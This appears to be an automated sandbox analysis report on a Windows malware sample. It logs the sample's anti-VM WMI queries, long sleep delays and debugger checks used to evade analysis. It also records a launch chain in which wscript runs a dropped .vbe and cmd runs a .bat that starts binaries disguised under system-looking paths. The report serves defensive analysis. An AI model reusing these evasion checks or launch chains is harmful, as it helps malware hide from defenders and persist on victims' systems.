              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: Idle.exe PID: 4476, type: MEMORYSTR
              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\ProgramData\ssh\System.exeMemory allocated: 16E0000 memory reserve | memory write watchJump to behavior
              Source: C:\ProgramData\ssh\System.exeMemory allocated: 1B060000 memory reserve | memory write watchJump to behavior
              Source: C:\Recovery\Idle.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Recovery\Idle.exeMemory allocated: 1A590000 memory reserve | memory write watchJump to behavior
              Source: C:\Recovery\Idle.exeMemory allocated: A40000 memory reserve | memory write watch
              Source: C:\Recovery\Idle.exeMemory allocated: 1A400000 memory reserve | memory write watch
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMemory allocated: AA0000 memory reserve | memory write watch
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMemory allocated: 1A680000 memory reserve | memory write watch
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMemory allocated: CF0000 memory reserve | memory write watch
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeMemory allocated: 1A7E0000 memory reserve | memory write watch
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BE80338 rdtsc 30_2_00007FFD9BE80338
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BA90525 sldt word ptr [eax]30_2_00007FFD9BA90525
              Source: C:\ProgramData\ssh\System.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599763Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599652Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599327Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598860Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598484Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598133Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597996Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597866Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\ProgramData\ssh\System.exeWindow / User API: threadDelayed 1239Jump to behavior
              Source: C:\ProgramData\ssh\System.exeWindow / User API: threadDelayed 1033Jump to behavior
              Source: C:\Recovery\Idle.exeWindow / User API: threadDelayed 3452Jump to behavior
              Source: C:\Recovery\Idle.exeWindow / User API: threadDelayed 6054Jump to behavior
              Source: C:\Recovery\Idle.exeWindow / User API: foregroundWindowGot 1767Jump to behavior
              Source: C:\Recovery\Idle.exeWindow / User API: threadDelayed 367
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeWindow / User API: threadDelayed 366
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeWindow / User API: threadDelayed 366
              Source: C:\ProgramData\ssh\System.exe TID: 5800Thread sleep count: 1239 > 30Jump to behavior
              Source: C:\ProgramData\ssh\System.exe TID: 5800Thread sleep count: 1033 > 30Jump to behavior
              Source: C:\ProgramData\ssh\System.exe TID: 4080Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -25825441703193356s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599763s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599652s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599546s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599327s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -599094s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598860s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598703s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598594s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598484s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598359s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598250s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -598133s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -597996s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -597866s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 7660Thread sleep time: -597750s >= -30000sJump to behavior
              Source: C:\Recovery\Idle.exe TID: 6560Thread sleep count: 367 > 30
              Source: C:\Recovery\Idle.exe TID: 3852Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe TID: 1612Thread sleep count: 366 > 30
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe TID: 6472Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe TID: 7068Thread sleep count: 366 > 30
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe TID: 6104Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
              Source: C:\Recovery\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\ssh\System.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Recovery\Idle.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Recovery\Idle.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_000FA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_000FA5F4
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0010B8E0
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010DD72 VirtualQuery,GetSystemInfo,0_2_0010DD72
              Source: C:\ProgramData\ssh\System.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599763Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599652Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599327Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598860Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598703Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598484Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598359Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 598133Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597996Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597866Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 597750Jump to behavior
              Source: C:\Recovery\Idle.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\userJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\ProgramData\ssh\System.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitioni
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
              Source: Idle.exe, 0000001E.00000002.4208170233.000000001C58D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B660000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service{
              Source: wscript.exe, 00000001.00000003.1764950335.00000000028ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B731000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Serviceta!Uu
              Source: wscript.exe, 00000001.00000003.1764950335.00000000028ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B731000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
              Source: Idle.exe, 0000001E.00000002.4121489227.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW,{N)
              Source: Idle.exe, 0000001E.00000002.4121489227.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
              Source: Idle.exe, 0000001E.00000002.4209362462.000000001C6CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V niyeugtbtsajbqk Bus
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
              Source: Idle.exe, 0000001E.00000002.4121489227.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipesf
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002813000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: Idle.exe, 0000001E.00000002.4205821755.000000001B66B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V niyeugtbtsajbqk Bus Pipes+
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeAPI call chain: ExitProcess graph end nodegraph_0-23587
              Source: C:\ProgramData\ssh\System.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Recovery\Idle.exeCode function: 30_2_00007FFD9BE80338 rdtsc 30_2_00007FFD9BE80338
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0011866F
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011753D mov eax, dword ptr fs:[00000030h]0_2_0011753D
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011B710 GetProcessHeap,0_2_0011B710
              Source: C:\ProgramData\ssh\System.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Recovery\Idle.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Recovery\Idle.exeProcess token adjusted: Debug
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess token adjusted: Debug
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010F063 SetUnhandledExceptionFilter,0_2_0010F063
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0010F22B
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0011866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0011866F
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0010EF05
              Source: C:\ProgramData\ssh\System.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\ssh\System.exe "C:\\ProgramData\ssh\System.exe"Jump to behavior
              Source: C:\ProgramData\ssh\System.exeProcess created: unknown unknownJump to behavior
              Source: Idle.exe, 0000001E.00000002.4213265360.000000001D5BB000.00000004.00000020.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4211898288.000000001D4AA000.00000004.00000020.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4211898288.000000001D4A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.00000000029FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerPq~
              Source: Idle.exe, 0000001E.00000002.4123458318.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002942000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002B72000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002B4A000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerPq~X
              Source: Idle.exe, 0000001E.00000002.4213265360.000000001D5BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
              Source: Idle.exe, 0000001E.00000002.4213265360.000000001D5BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)
              Source: Idle.exe, 0000001E.00000002.4123458318.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002942000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002A05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerX
              Source: Idle.exe, 0000001E.00000002.4213265360.000000001D5BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.15;%
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: 0_2_0010ED5B cpuid 0_2_0010ED5B
              Source: C:\Users\user\Desktop\6uPVRnocVS.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0010A63C
              Source: C:\ProgramData\ssh\System.exeQueries volume information: C:\ProgramData\ssh\System.exe VolumeInformationJump to behavior
              Source: C:\ProgramData\ssh\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\ProgramData\ssh\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Recovery\Idle.exe VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Recovery\Idle.exeQueries volume information: C:\Recovery\Idle.exe VolumeInformation
              Source: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exeQueries volume information: C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe VolumeInformation
